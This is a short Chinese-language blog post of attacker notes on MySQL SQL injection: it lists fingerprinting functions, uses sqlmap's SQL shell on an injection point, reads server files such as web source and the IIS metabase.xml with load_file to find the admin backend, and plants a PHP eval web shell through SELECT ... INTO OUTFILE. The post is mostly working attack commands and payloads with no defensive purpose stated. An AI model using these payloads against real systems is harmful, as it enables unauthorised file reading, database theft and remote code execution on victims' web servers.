注入漏洞

基本信息

database():数据库名

version():数据库版本

user():数据库用户

@@version_compile_os:操作系统

=========================================

mysql  4.0注入

1.利用sqlmap注入读取文件

2.查询表名称

3.进行查询

找到注入点之后

我们sqlmap.py -u " "  --sql-shell   (这样可以执行sql语句)

我们使用select load_file('home/webroot/cw/index.php')

等到我们读到了新文件,我们再去寻找,依次这样找到管理目录

比如后台是如何验证的,然后根据字段和表名查询数据库

 如果是03的话,并且是IIs的容器的话,我们可以先读取C:/windows/system32/metabase.xml

 

接着我们再找寻Inetpub这个目录,这是作为IIs的根目录

在读的时候把/更改为了\\

--------------------------------------------------------

写入文件

select 1,"<?php

@eval($_POST['1']);

?>",3,4,5,...into outfile '里面填写的绝对路径必须得知'(可通过上面的load_file)

posted @ 2016-02-21 09:57  平何去何  阅读(93)  评论(0)    收藏  举报